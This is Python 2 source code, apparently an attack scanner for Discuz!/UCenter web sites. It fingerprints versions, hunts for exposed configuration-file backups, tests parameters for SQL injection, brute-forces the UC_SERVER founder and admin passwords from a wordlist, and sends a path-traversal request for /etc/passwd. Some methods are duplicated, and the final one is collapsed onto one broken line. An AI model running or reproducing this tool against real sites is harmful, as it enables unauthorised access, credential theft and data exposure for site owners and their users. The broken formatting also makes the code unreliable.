def GetVersion(self, target):
    """Report any release-looking tag found in the target's robots.txt.

    Fetches ``target + 'robots.txt'`` via ``self.Scanner.GetData`` and runs
    an alternation of version tokens over ``str(result[2])`` (with
    ``regstr='*'`` the third element appears to carry the page text --
    confirm against Scanner.GetData). The raw ``re.findall`` output, a
    list of group tuples that are mostly empty strings, is printed as-is.

    Args:
        target: base URL, presumably ending in '/' so the path appends cleanly.

    Returns:
        None; everything goes through colprint.

    Two limitations are visible in the pattern itself: the dots are not
    escaped, and 'X2' / 'X3' precede their longer siblings in the
    alternation, so a longer tag may be reported as the shorter one.
    """
    page = self.Scanner.GetData(target + 'robots.txt', regstr='*')
    release_tags = '(X2)|(X2.5)|(X3.1)|(X3.2)|(X3)|(7.0.0)|(7.2)|(6.0.0)'
    found = re.findall(release_tags, str(page[2]))
    colprint.strprint(10, 'VERSION is ')
    colprint.strprint(10, found)
def GetVersion(self, target):
    """Print the non-empty groups of the first version tag matched in robots.txt.

    Same probe as the sibling GetVersion above (``target + 'robots.txt'``,
    ``regstr='*'``), but ``result[2]`` is passed to ``re.findall`` without
    ``str()`` and only the first match tuple is reported, one non-empty
    group per line. Prints 'VERSION not found' when nothing matches.

    Args:
        target: base URL, presumably ending in '/'.

    Returns:
        None.

    The pattern's dots are unescaped and 'X2' / 'X3' are tried before
    'X2.5' / 'X3.x', so the shorter tag can win over the longer one.
    """
    page = self.Scanner.GetData(target + 'robots.txt', regstr='*')
    release_tags = '(X2)|(X2.5)|(X3.1)|(X3.2)|(X3)|(7.0.0)|(7.2)|(6.0.0)'
    hits = re.findall(release_tags, page[2])
    if not hits:
        print 'VERSION not found'
        return
    # findall yields one tuple per match; every alternative is its own group,
    # so all but one entry of the first tuple is the empty string.
    for group in hits[0]:
        if group:
            colprint.strprint(10, 'VERSION is ' + group)
def GetBak(self, target):
    """Look for leftover copies of the site's configuration files.

    First pass: requests ``target + '?<n>'`` for n in 1..10 with a regstr
    that captures the anchor text of a ``uid=<n>`` link (presumably a
    user name; confirm against Scanner.GetData) and prints whatever
    GetData returns, unfiltered. Second pass: for each of ten backup /
    editor suffixes ('%23' and '%7e' are URL-encoded '#' and '~') it
    requests the three configuration files with that suffix and reports a
    hit whenever the status is 200; the PHP-open-tag regstr is passed
    through but its match is not inspected here.

    Args:
        target: base URL, presumably ending in '/'.

    Returns:
        None; findings go to colprint / stdout.

    These are exactly the files a web server should never serve out of
    config/ or data/, whatever suffix an editor or backup left on them.
    """
    for uid in range(1, 11):
        probe = target + '?' + str(uid)
        outcome = self.Scanner.GetData(probe, regstr='uid=' + str(uid) + '">(\S+)</a>')
        print outcome
    suffixes = ['%23', '.bak', '_bak', '.swp', '.orig', '.txt', '.old', '%7e', '.inc', '_inc']
    config_files = ('config/config_ucenter.php', 'config/config_global.php', 'data/config.inc.php')
    # Same request order as before: every file for one suffix, then the next suffix.
    for suffix in suffixes:
        for config_file in config_files:
            outcome = self.Scanner.GetData(target + config_file + suffix, regstr='<\?php')
            if outcome[1] == 200:
                colprint.strprint(10, 'Something is Found')
def GetBak(self, target):
    """Look for leftover copies of the site's configuration files, verbosely.

    Identical to the sibling GetBak above except that every backup probe
    also prints ``status, url`` before the 200 check, so the full list of
    tried paths and their status codes ends up on stdout.

    Args:
        target: base URL, presumably ending in '/'.

    Returns:
        None.
    """
    for uid in range(1, 11):
        probe = target + '?' + str(uid)
        outcome = self.Scanner.GetData(probe, regstr='uid=' + str(uid) + '">(\S+)</a>')
        print outcome
    suffixes = ['%23', '.bak', '_bak', '.swp', '.orig', '.txt', '.old', '%7e', '.inc', '_inc']
    config_files = ('config/config_ucenter.php', 'config/config_global.php', 'data/config.inc.php')
    for suffix in suffixes:
        for config_file in config_files:
            candidate = target + config_file + suffix
            outcome = self.Scanner.GetData(candidate, regstr='<\?php')
            # Status and URL are printed for every probe, hit or not.
            print outcome[1], candidate
            if outcome[1] == 200:
                colprint.strprint(10, 'Something is Found')
def ScanSql(self,url, data=None):
    """Probe each GET/POST parameter of *url* for SQL-injection symptoms.

    Per parameter, two checks run in order:

    1. error-based -- append a shuffled copy of self.TAMPER_SQL_CHAR_POOL
       to the value and search the returned HTML for any signature in
       self.DBMS_ERRORS;
    2. boolean-based blind -- for every prefix/boolean/suffix template
       (self.PREFIXES x self.BOOLEAN_TESTS x self.SUFFIXES) send a "true"
       and a "false" variant and compare both with an unmodified baseline,
       first on HTTP code / page title, then on a difflib ratio against
       self.FUZZY_THRESHOLD.

    Depends on class attributes defined outside this block: self.GET and
    self.POST (phase labels compared with ``is``), the self.HTML /
    self.HTTPCODE / self.TITLE / self.TEXT indices into whatever
    self._retrieve_content returns, and the pools named above.

    Args:
        url: target URL; an empty parameter (``p=`` followed by ``&`` or
            end of string) is first given the value ``1``.
        data: optional POST body, normalised the same way.

    Returns:
        True if any parameter tripped either check, otherwise False
        (also after Ctrl-C, with whatever was found up to that point).

    Server-side this traffic has a recognisable shape per parameter: one
    request whose value ends in random punctuation, then pairs of
    near-identical requests differing only in a small integer comparison.
    """
    is_vul, usable = False, False
    # Give empty parameters a value so the finditer pattern below still captures them.
    url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
    try:
        for phase in (self.GET, self.POST):
            # `current` is the string whose parameters get rewritten in this phase;
            # `original` (the baseline response) is fetched lazily, once per phase.
            original, current = None, url if phase is self.GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
                vulnerable, usable = False, True
                print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
                # --- error-based: append the shuffled character pool to the value ---
                tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(self.TAMPER_SQL_CHAR_POOL, len(self.TAMPER_SQL_CHAR_POOL))))))
                content = self._retrieve_content(tampered, data) if phase is self.GET else self._retrieve_content(url, tampered)
                for (dbms, regex) in ((dbms, regex) for dbms in self.DBMS_ERRORS for regex in self.DBMS_ERRORS[dbms]):
                    # First matching signature wins; `vulnerable` short-circuits the rest.
                    if not vulnerable and re.search(regex, content[self.HTML], re.I):
                        colprint.strprint(4, " (i) %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms))
                        is_vul = vulnerable = True
                # --- boolean-based blind: reset the per-check flag, keep is_vul ---
                vulnerable = False
                original = original or (self._retrieve_content(current, data) if phase is self.GET else self._retrieve_content(url, current))
                randint = random.randint(1, 255)
                for prefix, boolean, suffix in itertools.product(self.PREFIXES, self.BOOLEAN_TESTS, self.SUFFIXES):
                    if not vulnerable:
                        template = "%s%s%s" % (prefix, boolean, suffix)
                        # The template must accept two values: the True variant gets
                        # (randint + 1, randint), the False variant (randint, randint).
                        payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (randint + 1 if _ else randint, randint), safe='%')))) for _ in (True, False))
                        contents = dict((_, self._retrieve_content(payloads[_], data) if phase is self.GET else self._retrieve_content(url, payloads[_])) for _ in (False, True))
                        # Cheap signal first: baseline and True agree on code or title while False differs.
                        if all(_[self.HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (self.HTTPCODE, self.TITLE))):
                            vulnerable = True
                        else:
                            # Otherwise fall back to body similarity on either side of the threshold.
                            ratios = dict((_, difflib.SequenceMatcher(None, original[self.TEXT], contents[_][self.TEXT]).quick_ratio()) for _ in (True, False))
                            vulnerable = all(ratios.values()) and ratios[True] > self.FUZZY_THRESHOLD and ratios[False] < self.FUZZY_THRESHOLD
                        if vulnerable:
                            colprint.strprint(4," (i) %s parameter '%s' appears to be blind SQLi vulnerable" % (phase, match.group("parameter")))
                            is_vul = True
        if not usable:
            colprint.strprint(2, " (x) no usable GET/POST parameters found")
    except KeyboardInterrupt:
        # Partial results are still returned after an interrupt.
        print "\r (x) Ctrl-C pressed"
    return is_vul
def PwdList(self, target):
    """Run the local password.txt wordlist against the UC_SERVER and admin logins.

    Bails out unless ``uc_server/admin.php?m=user&a=login`` answers 200,
    then notes whether ``develop.php`` and ``utility`` answer 200 as well.
    For every stripped line of ``password.txt`` (read from the current
    directory) it calls ``self.GetFounderPwd`` and then ``self.GetPwd`` --
    both defined elsewhere in this class -- and treats a ``sid=`` in the
    first element of their result as a successful login.

    Args:
        target: base URL, presumably ending in '/'.

    Returns:
        None in every case (explicitly on the early exit).

    From the server's log this is two login attempts per wordlist line
    against the same two endpoints, which is what a lockout or rate limit
    on that login would be keyed on.
    """
    probe = self.Scanner.GetData(target + 'uc_server/admin.php?m=user&a=login')
    if probe[1] != 200:
        colprint.strprint(12, 'UC_SERVER is not usable!')
        return None
    colprint.strprint(10, 'UC_SERVER is usable.')
    for path, note in (('develop.php', 'develop is usable!'), ('utility', 'utility path is found.')):
        if self.Scanner.GetData(target + path)[1] == 200:
            colprint.strprint(10, note)
    # Founder login is tried before the admin login for each guess, as before.
    logins = (('UC_SERVER Founder ', self.GetFounderPwd), ('admin ', self.GetPwd))
    with open('password.txt', 'r') as wordlist:
        for raw in wordlist:
            guess = raw.strip()
            for label, attempt in logins:
                outcome = attempt(target, guess)
                print label, guess
                if re.findall('(sid=)', outcome[0]):
                    colprint.strprint(10, 'Passwd is Found ' + guess)
def serverbanner(self,target): result=self.Scanner.GetData(target,'OPTIONS')#OPTIONS is Enable if result[1]==200 and (result[2].get('allow',1))!=1: colprint.strprint(2,'\nOPTIONS is Enable: '+result[2]['allow']) PutEnable=re.search('PUT',result[2]['allow']) if PutEnable: colprint.strprint(4,'PUT Method is Enable!') result=self.Scanner.GetData(target)# Server Banner print result if result[1]==200 and (result[2].get('server',1))!=1: colprint.strprint(2,'Server:'+result[2]['server']) if result[1]==200 and (result[2].get('x-powered-by',1))!=1: colprint.strprint(2,'x-powered-by:'+result[2]['x-powered-by']) result=self.Scanner.GetData(target+'robots.txt',regstr='*')#Server robots.txt if result[1]==200: colprint.strprint(2,'robots.txt') colprint.strprint(2,result[2]) _line='..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' url=target+_line result=self.Scanner.GetData(url,regstr='*') print result[2]